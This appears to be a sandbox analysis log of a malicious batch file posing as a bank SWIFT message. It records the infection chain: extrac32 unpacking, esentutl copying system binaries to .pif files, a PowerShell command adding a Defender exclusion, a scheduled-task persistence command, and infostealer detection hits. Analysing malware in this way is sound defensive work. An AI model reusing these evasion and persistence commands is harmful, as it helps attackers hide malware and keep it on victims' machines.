                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02AADBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,26_2_02AADBB0
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02AADC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,26_2_02AADC8C
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02AADC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,26_2_02AADC04
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02AA8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,26_2_02AA8D6E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A18788 CreateProcessAsUserW,4_2_02A18788
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A020C44_2_02A020C4
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_016BAA4213_2_016BAA42
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_016BEA8013_2_016BEA80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_016B4A9813_2_016B4A98
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_016BDF0013_2_016BDF00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_016B3E8013_2_016B3E80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_016B41C813_2_016B41C8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_016BDF0013_2_016BDF00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06DC66E813_2_06DC66E8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06DC56B813_2_06DC56B8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06DC7E7813_2_06DC7E78
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06DCC2A013_2_06DCC2A0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06DCB32A13_2_06DCB32A
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06DC317813_2_06DC3178
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06DC779813_2_06DC7798
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06DCE4C013_2_06DCE4C0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06DC5DDF13_2_06DC5DDF
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06DC235013_2_06DC2350
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06DC004013_2_06DC0040
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_06DC000713_2_06DC0007
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 14_2_030B85B714_2_030B85B7
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 14_2_030B85C814_2_030B85C8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_04EBB49015_2_04EBB490
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_04EBB47015_2_04EBB470
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 19_2_05E5DAAC19_2_05E5DAAC
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 19_2_05E525A819_2_05E525A8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 19_2_05E525B819_2_05E525B8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 19_2_05E5255F19_2_05E5255F
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 19_2_05E5E60819_2_05E5E608
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 19_2_05E51D2019_2_05E51D20
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 19_2_0677336019_2_06773360
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02A920C426_2_02A920C4
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_0101AA4828_2_0101AA48
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_0101EA8028_2_0101EA80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_01014A9828_2_01014A98
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_0101DE3828_2_0101DE38
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_01013E8028_2_01013E80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_010141C828_2_010141C8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_0101DE3828_2_0101DE38
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_01012FFC28_2_01012FFC
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_069147CC28_2_069147CC
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_06911B4828_2_06911B48
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_069167F128_2_069167F1
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_06911F1028_2_06911F10
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_06915AC028_2_06915AC0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_06915A4128_2_06915A41
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_06915B0828_2_06915B08
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_069256B828_2_069256B8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_069266E828_2_069266E8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_06927E7828_2_06927E78
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_0692C2A028_2_0692C2A0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_0692B33828_2_0692B338
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_0692236028_2_06922360
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_0692779828_2_06927798
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_0692E4C028_2_0692E4C0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_06925DF028_2_06925DF0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_0692004028_2_06920040
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_0692002528_2_06920025
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\lxsyrsiW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02AA894C appears 50 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02A946D4 appears 155 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02A94860 appears 683 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02A1894C appears 56 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02A046D4 appears 244 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02A189D0 appears 45 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02A04500 appears 33 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02A04860 appears 949 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02A044DC appears 74 times
                      Source: 13.0.neworigin.exe.d90000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: armsvc.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: armsvc.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winBAT@54/27@5/3
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A07FD2 GetDiskFreeSpaceA,4_2_02A07FD2
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A16DC8 CoCreateInstance,4_2_02A16DC8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4132:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-924cae54405a0e313d78ffaf-b
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-924cae54405a0e31-inf
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\CAB02848.TMPJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" "
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batReversingLabs: Detection: 23%
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_12-258
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
                      Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp692E.tmp.cmd""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: unknownProcess created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /oJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp692E.tmp.cmd""Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apllllphllelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttpcom.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mskeyprotect.dllJump to behavior
